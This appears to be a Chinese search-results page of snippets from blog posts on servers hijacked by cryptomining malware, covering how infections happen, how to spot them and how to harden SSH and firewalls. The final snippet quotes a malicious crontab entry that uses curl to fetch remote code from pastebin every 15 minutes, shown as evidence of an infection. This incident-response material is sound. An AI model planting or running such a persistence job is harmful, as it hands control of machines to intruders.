痛心：实验室服务器被黑挖矿怎么办？ 痛心：实验室服务器被黑挖矿怎么办？ 更改SSH配置 限制IP访问 设置Linux-PAM 开启防火墙 查看日志 参考资料 实验室的服务器有比较高的配置，安装了多块显卡，平时实验室 ...

什么是挖矿木马 挖矿木马会占用CPU进行超频运算，从而占用主机大量的CPU资源，严重影响服务器上的其他应用的正常运行。黑客为了得到更多的算力资源，一般都会对全网进行无差别扫描，同时利用SSH爆破和漏洞利用等手段攻击主机。部分挖矿木马还具备蠕虫化的特点，在主机被成功入侵之后，挖矿木马还会向内网渗透 ...

查看哪个进程占据cup 通过 top 或者使用 ps aux 我这个通过top 命令看不到哪个进程占用了cup ,执行 cat /etc/ld.so.preload 查看，里面也加载了异常的 ...

新的一天的开始 周五早上刚到公司，同事来问我系统为啥打不开了？我第一反应就是肯定 Nginx 服务器挂了呗，立马就去登录服务器看看，但此时发现已经完全远程登录不上这台部署了 Nginx 和 Redis 的服务器了，此刻心理活动如下： 难道服务器欠费了？ 难道服务器到期了？ 都不对阿，一起 ...

一般情况下，挖矿病毒都是自动扫描+自动挂马生成的，并不会是有专人进行攻击，所以也比较好清除，注意清除之后需要 check 有无后门。 最重要几点（也可能是被hack的原因）：禁止 ROOT 用户登陆，ROOT 不能使用弱密码，FRP 需要配置，不能使用默认选项。 挖矿进程占用的 CPU 资源 ...

最近很多小伙伴服务器都被挖矿了，简单总结下在应急过程中，常遇到的一些被挖矿的特征，以及防护方法，工具后面会进行详细的介绍分享。 问题所在 要防止被挖矿，首先要明白挖矿的本质。挖矿本质就是快速产出，利用可以利用的资源，实现快速产出，获取收益 ...

上个月末，我也尝试到了服务器被病毒入侵的滋味，正好这个月末来复盘一下。 怎么说呢，那个感觉就像是你自己的娃在外面被揍了一样，你得想办法为孩子出人头地呀，是吧。于是这一波病毒反击战就正式上演了。 ## 一出好戏 先说一下我是怎么发现服务器被入侵的。那是在一个愉快的下班时间，我的手机端又提示收到了阿里 ...

这几天阿里云云服务器cpu一直跑满，一查发现有个定时任务，在搜索一下，发现自己中毒了，原来前几天搞redis学习的时候设置了个弱密码，被ssh暴力破解植入病毒了。 crontab -l*/15 * * * * (curl -fsSL https://pastebin.com/raw ...